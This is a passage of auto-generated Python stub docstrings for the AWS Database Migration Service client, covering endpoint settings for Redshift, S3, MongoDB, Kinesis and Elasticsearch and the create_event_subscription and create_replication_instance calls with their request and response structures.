The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointIdentifier: string
:param EndpointIdentifier: **[REQUIRED]**
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
:type EndpointType: string
:param EndpointType: **[REQUIRED]**
The type of endpoint.
:type EngineName: string
:param EngineName: **[REQUIRED]**
The type of engine for the endpoint. Valid values, depending on the ``EndPointType`` value, include ``mysql`` , ``oracle`` , ``postgres`` , ``mariadb`` , ``aurora`` , ``aurora-postgresql`` , ``redshift`` , ``s3`` , ``db2`` , ``azuredb`` , ``sybase`` , ``dynamodb`` , ``mongodb`` , and ``sqlserver`` .
:type Username: string
:param Username:
The user name to be used to log in to the endpoint database.
:type Password: string
:param Password:
The password to be used to log in to the endpoint database.
:type ServerName: string
:param ServerName:
The name of the server where the endpoint database resides.
:type Port: integer
:param Port:
The port used by the endpoint database.
:type DatabaseName: string
:param DatabaseName:
The name of the endpoint database.
:type ExtraConnectionAttributes: string
:param ExtraConnectionAttributes:
Additional attributes associated with the connection.
:type KmsKeyId: string
:param KmsKeyId:
The AWS KMS key identifier to use to encrypt the connection parameters. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type Tags: list
:param Tags:
Tags to be added to the endpoint.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:type CertificateArn: string
:param CertificateArn:
The Amazon Resource Name (ARN) for the certificate.
:type SslMode: string
:param SslMode:
The Secure Sockets Layer (SSL) mode to use for the SSL connection. The SSL mode can be one of four values: ``none`` , ``require`` , ``verify-ca`` , ``verify-full`` . The default value is ``none`` .
:type ServiceAccessRoleArn: string
:param ServiceAccessRoleArn:
The Amazon Resource Name (ARN) for the service access role that you want to use to create the endpoint.
:type ExternalTableDefinition: string
:param ExternalTableDefinition:
The external table definition.
:type DynamoDbSettings: dict
:param DynamoDbSettings:
Settings in JSON format for the target Amazon DynamoDB endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to DynamoDB <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.DynamoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service access IAM role.
:type S3Settings: dict
:param S3Settings:
Settings in JSON format for the target Amazon S3 endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Amazon S3 as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.S3.html#CHAP_Target.S3.Configuring>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a newline (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``\"arn:aws:s3:::dms-*\"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this maximum, the column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1 MiB). For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but as the number of row groups grows, writes become slower. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
:type DmsTransferSettings: dict
:param DmsTransferSettings:
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To compress the target files, set this value to ``GZIP`` . To leave the files uncompressed, don\'t use this attribute or set it to ``NONE`` (the default).
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ \"ServiceAccessRoleArn\": \"string\", \"BucketName\": \"string\", \"CompressionType\": \"none\"|\"gzip\" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
:type MongoDbSettings: dict
:param MongoDbSettings:
Settings in JSON format for the source MongoDB endpoint. For more information about the available settings, see the configuration properties section in `Using MongoDB as a Source for AWS Database Migration Service <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Source.MongoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when ``authType=NO`` .
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type KinesisSettings: dict
:param KinesisSettings:
Settings in JSON format for the target Amazon Kinesis Data Streams endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to a Kinesis Data Stream <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Kinesis.html#CHAP_Target.Kinesis.ObjectMapping>`__ in the *AWS Database Migration Service User Guide.*
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
:type ElasticsearchSettings: dict
:param ElasticsearchSettings:
Settings in JSON format for the target Elasticsearch endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Elasticsearch as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Elasticsearch.html#CHAP_Target.Elasticsearch.Configuration>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service to access the IAM role.
- **EndpointUri** *(string) --* **[REQUIRED]**
The endpoint for the Elasticsearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
:type RedshiftSettings: dict
:param RedshiftSettings:
Settings in JSON format for the Amazon Redshift endpoint.
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of \'YYYY-MM-DD\'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``\"arn:aws:s3:::*\"`` to use the following actions: ``\"s3:PutObject\", \"s3:ListBucket\"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is \"?\".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), \'timeformat_string\', \'epochsecs\', or \'epochmillisecs\'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:rtype: dict
:returns:
"""
pass
def create_event_subscription(self, SubscriptionName: str, SnsTopicArn: str, SourceType: str = None, EventCategories: List = None, SourceIds: List = None, Enabled: bool = None, Tags: List = None) -> Dict:
"""
Creates an AWS DMS event notification subscription.
You can specify the type of source (``SourceType`` ) you want to be notified of, provide a list of AWS DMS source IDs (``SourceIds`` ) that trigger the events, and provide a list of event categories (``EventCategories`` ) for events you want to be notified of. If you specify both the ``SourceType`` and ``SourceIds`` , such as ``SourceType = replication-instance`` and ``SourceIdentifier = my-replinstance`` , you will be notified of all the replication instance events for the specified source. If you specify a ``SourceType`` but don't specify a ``SourceIdentifier`` , you receive notice of the events for that source type for all your AWS DMS sources. If you don't specify either ``SourceType`` or ``SourceIdentifier`` , you will be notified of events generated from all AWS DMS sources belonging to your customer account.
For more information about AWS DMS events, see `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateEventSubscription>`_
**Request Syntax**
::
response = client.create_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
SourceIds=[
'string',
],
Enabled=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The event subscription that was created.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A list of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the AWS DMS event notification subscription.
Constraints: The name must be less than 255 characters.
:type SnsTopicArn: string
:param SnsTopicArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates the events. For example, if you want to be notified of events generated by a replication instance, you set this parameter to ``replication-instance`` . If this value is not specified, all events are returned.
Valid values: replication-instance | migration-task
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to. You can see a list of the categories for a given source type by calling the ``DescribeEventCategories`` action or in the topic `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
- *(string) --*
:type SourceIds: list
:param SourceIds:
The list of identifiers of the event sources for which events will be returned. If not specified, then all sources are included in the response. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
- *(string) --*
:type Enabled: boolean
:param Enabled:
A Boolean value; set to ``true`` to activate the subscription, or set to ``false`` to create the subscription but not activate it.
:type Tags: list
:param Tags:
A tag to be attached to the event subscription.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:rtype: dict
:returns:
"""
pass
def create_replication_instance(self, ReplicationInstanceIdentifier: str, ReplicationInstanceClass: str, AllocatedStorage: int = None, VpcSecurityGroupIds: List = None, AvailabilityZone: str = None, ReplicationSubnetGroupIdentifier: str = None, PreferredMaintenanceWindow: str = None, MultiAZ: bool = None, EngineVersion: str = None, AutoMinorVersionUpgrade: bool = None, Tags: List = None, KmsKeyId: str = None, PubliclyAccessible: bool = None, DnsNameServers: str = None) -> Dict:
"""
Creates the replication instance using the specified parameters.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/CreateReplicationInstance>`_
**Request Syntax**
::
response = client.create_replication_instance(
ReplicationInstanceIdentifier='string',
AllocatedStorage=123,
ReplicationInstanceClass='string',
VpcSecurityGroupIds=[
'string',
],
AvailabilityZone='string',
ReplicationSubnetGroupIdentifier='string',
PreferredMaintenanceWindow='string',
MultiAZ=True|False,
EngineVersion='string',
AutoMinorVersionUpgrade=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
KmsKeyId='string',
PubliclyAccessible=True|False,
DnsNameServers='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that was created.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the Availability Zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
One or more public IP addresses for the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
One or more private IP addresses for the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
